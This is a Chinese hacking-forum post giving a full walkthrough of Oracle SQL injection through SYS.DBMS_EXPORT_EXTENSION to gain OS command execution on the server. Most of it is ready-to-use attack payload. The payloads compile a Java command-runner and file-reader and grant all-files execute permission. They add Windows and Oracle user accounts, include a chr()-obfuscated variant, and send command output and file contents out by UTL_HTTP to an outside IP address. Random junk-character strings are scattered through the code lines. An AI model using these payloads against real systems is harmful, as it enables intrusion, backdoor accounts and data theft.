中国网络渗透测试联盟

标题: 实例演示oracle注入获取cmdshell的全过程 [打印本页]
作者: admin    时间: 2012-12-18 12:21
标题: 实例演示oracle注入获取cmdshell的全过程
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 ' R1 K* }+ g) I! j% w% e+ Y
% N; e1 G' L3 p) E8 \2 w: n
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
) ^6 Y' e1 i: l2 u的形式即可。(用" 'a'|| "是为了让语句返回true值)
, O) B) Q8 Q3 `# D/ t: L语句有点长,可能要用post提交。 / U8 t/ c; H0 @
以下是各个步骤: ' p% ]0 c) Z, o
1.创建包 % u( @6 K- a' z( [4 ^  |) m, w7 i
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
5 o$ {% ]. U! d( F8 ~) b# f; w/xxx.jsp?id=1 and '1'<>'a'||( & R5 b; V# r3 s
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''. p0 G0 w+ W+ z3 @0 |
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
2 q+ `5 K. j) [4 C! E. z: ^new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
1 W2 e7 o- t3 b" ^4 r, m0 l% Q}'''';END;'';END;--','SYS',0,'1',0) from dual
! o* Y% ?" y  I) 5 C2 N# n6 c. [, {4 r2 T9 d
------------------------
- \$ J& X" \, I/ ]# B如果url有长度限制,可以把readFile()函数块去掉,即: 1 g9 i+ ~, i. `9 `
/xxx.jsp?id=1 and '1'<>'a'||( 9 ^. v- I, @9 Q* ~' ?/ }" |" a
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
3 O  w3 z7 L+ e( O# v- ]create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
5 U* k. \+ ]# y2 s& I$ |6 vnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
  i$ G) M3 }3 g) ~* k}'''';END;'';END;--','SYS',0,'1',0) from dual
- S/ K; O+ H3 J8 t* y( d, c) ! G( B8 p! J7 g! K* l) d* c
同时把后面步骤 提到的 对readFile()的处理语句去掉。
) q+ Q* ?; v' ]------------------------------
1 F3 \4 w' d- F1 ^# ]* e+ K) o2.赋Java权限 $ _2 d; _6 Y; ^4 E0 B2 b
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
! U# Y6 S0 a2 e' E3.创建函数 ) N4 E9 V( X4 c3 x1 e% L* N/ F
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
2 P$ Q3 Y1 o0 t4 G+ l6 Xcreate or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual& B" L$ G' Q1 b7 F: k3 v1 T
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
; F+ {5 s( ~' {/ t: Dcreate or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual" v- q; I5 _5 ]- |
4.赋public执行函数的权限
3 l  W, ]% F0 G& P, Yselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual' v  |1 a8 d7 P4 F9 C; M! d# e
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
* e. T& c$ b* C5 K; H5.测试上面的几步是否成功
9 v# w/ `' T2 K& f! v/ Y  ~and '1'<>'11'||( ! f/ [6 }/ O& H! [1 S
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD' * H, V' l/ q0 |6 `* @$ l( T8 @
) $ ?* R8 E9 R; z
and '1'<>(
! K; p; X0 R+ s, s; \/ E; \select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
0 X. s3 X: O( E$ y4 ?  Z)
5 q- `4 V  `2 t; |9 Y1 K6.执行命令:
7 i5 V, r1 {3 I* ?' E$ \/xxx.jsp?id=1 and '1'<>( + q7 J( h& e" w/ E) m
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
% y$ ]/ @( w" ]$ t, @8 c" x' g
; c: L" X( a( C5 ?6 B+ r)
8 ~$ ]& K$ K3 @+ r6 ]# x' K! I/xxx.jsp?id=1 and '1'<>( ( W  N- T$ }6 u$ _& U
select  sys.LinxReadFile('c:/boot.ini') from dual
- ~% o5 G) D. h4 o9 p) M* L( H! V1 ?% `$ y
)6 U& W! ^9 r! X8 L9 m. r' z. @
  
% Z, T1 _. m: h# x9 M注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
( `7 P( K( m5 _( w0 L, W' S% {( F, I如果要查看运行结果可以用 union :
, b# R& Z" k3 d/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual1 G( O- ~0 l' N& I2 A$ A
或者UTL_HTTP.request(:
. P. }2 d: ^+ O5 {/xxx.jsp?id=1 and '1'<>(
  `: U6 n: w! n- Q6 lSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual5 |5 w9 p3 O7 H: N) i# A6 i$ Z. q7 q5 b
) 3 I5 l! s; m* j# }1 y& Y6 z" G
/xxx.jsp?id=1 and '1'<>( 1 \( Z8 S% t% }. y$ H6 s& e
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual" M5 f$ j# ]7 r# m; w
)
5 X% H2 i. O- B/ \' \注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。3 a+ F" `/ @" [" H, J
--------------------
' U' H) o/ L4 a; i. h6.内部变化
, a6 t3 [5 P* N通过以下命令可以查看all_objects表达改变: : ?! [% Y% x5 T' S7 ^& M* A
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%', c" ^5 I' Y! m; q7 R: }
7.删除我们创建的函数 : R. M& Z- e* d+ g7 ?
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
* _1 C! J& m8 g# T( f2 x1 vdrop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual ! D* P, W4 W: A% a
====================================================
; t$ f+ [7 {) K全文结束。谨以此文赠与我的朋友。 $ Y: E; W& A, S* X' c9 }' J7 w
linx
  k. [5 y6 `8 a! k6 s" w124829445 5 H1 s. `3 E7 l: {
2008.1.12 & d3 L; ?& l$ M' a5 }
linyujian@bjfu.edu.cn
8 ]0 y& r, a, ?% O0 q  U====================================================================== 5 A  q3 u1 b! g6 X& m  g
测试漏洞的另一方法:
5 e! W# {$ Z5 z" v7 |创建oracle帐号: ( _/ S- T; M1 n) A3 B. |
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''* I8 F  b+ |8 c2 l2 r" Q
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
# _# i( Y& E% g& i( d! M5 G. a即:
  M! x7 d; Z; E' `8 E, @select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
6 B& k7 d4 p3 m9 X5 N7 ochr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual % n! D2 D7 h, x- S8 P" I/ z
确定漏洞存在: 7 G5 F7 `0 Z4 R; x- P7 ?, x
1<>(
: w' z- X4 r: k- Q$ O* R- vselect user_id from all_users where username='LINXSQL' $ z4 M, \! B+ R$ z# a. ?+ Z) e
) $ N4 u" y+ |; _7 i: R2 U6 ^4 H3 P
给linxsql连接权限:
. h5 j+ q9 I3 ]# mselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''% h2 [! `+ `  D! d" ^
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
8 N) Z' A0 j/ p, X' g4 @删除帐号: ; N" b2 s1 d, X
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
* K, }/ b8 F9 |- N7 d& `drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
7 h! `1 B- |( ^0 U3 }! D  v======================
! c8 Z- f; J1 V: b4 n- ~0 _- H1 C( v以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:
2 v% k) D1 J. g$ P0 q) J: C( F( Z1.jsp?id=1 and '1'<>(
- s0 C2 @# p: ]3 W! |8 W5 Yselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
, F1 v" Z: \" f& t9 O6 f0 h, \create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual+ s5 V) g& J% N/ z. x
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
2 _& P  _" V; \ )
5 g- p; a# x2 @
7 e' U& N  \$ \% b
! ~1 D" z) U3 ?' [' B3 V. U9 V1 U
& E2 i# L& W- @8 p3 F



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2